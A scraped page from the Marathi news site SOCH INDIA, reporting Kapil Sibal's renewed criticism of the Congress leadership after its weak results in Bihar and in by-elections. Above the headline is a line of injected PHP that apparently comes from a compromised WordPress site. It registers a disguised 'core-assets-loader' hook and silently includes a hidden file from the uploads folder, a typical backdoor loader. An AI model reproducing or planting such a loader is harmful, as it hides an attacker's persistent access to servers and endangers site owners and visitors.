add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कपिल सिब्बल यांचे कॉंग्रेस नेतृत्वावर पुन्हा टीकास्त्र – SOCH INDIA
Menu

देश
कपिल सिब्बल यांचे कॉंग्रेस नेतृत्वावर पुन्हा टीकास्त्र

nobanner

बिहारमधील काँग्रेसच्या खराब कामगिरीनंतर आता कपिल सिब्बल यांनी पुन्हा एकदा काँग्रेसच्या नेतृत्वावर टीकास्त्र डागलंय. मतदार आता काँग्रेसकडे सक्षम पर्याय म्हणून पाहात नाहीत, तसंच पक्षाच्या समस्यांकडे नेतृत्वाचं लक्षही नाही अशी टीका सिब्बल यांनी केलीय. याआधीही पक्षातल्या लेटर बॉम्बमध्ये सिब्बल यांनी पक्षावर टीका केली होती.

पक्षाला समस्यांची जाणीव आहे पण त्या सोडवण्यासाठी काहीही होत नाही अशी टीका त्यांनी केलीय. आमच्या काही जणांनी पक्षासाठी आगामी काळात काय करावं यासाठी पत्र लिहीलं पण आमचं ऐकण्याऐवजी त्यांनी आमच्याकडे पाठ फिरवली. त्याचा परिणाम आपण सगळेच पाहात आहोत.

केवळ बिहारच नाही, तर जिथे जिथे पोटनिवडणुका झाल्या तिथे मतदारांनी पक्षाला सक्षम पर्याय म्हणून स्वीकारलंच नाही अशी खंत सिब्बल यांनी व्यक्त केलीय.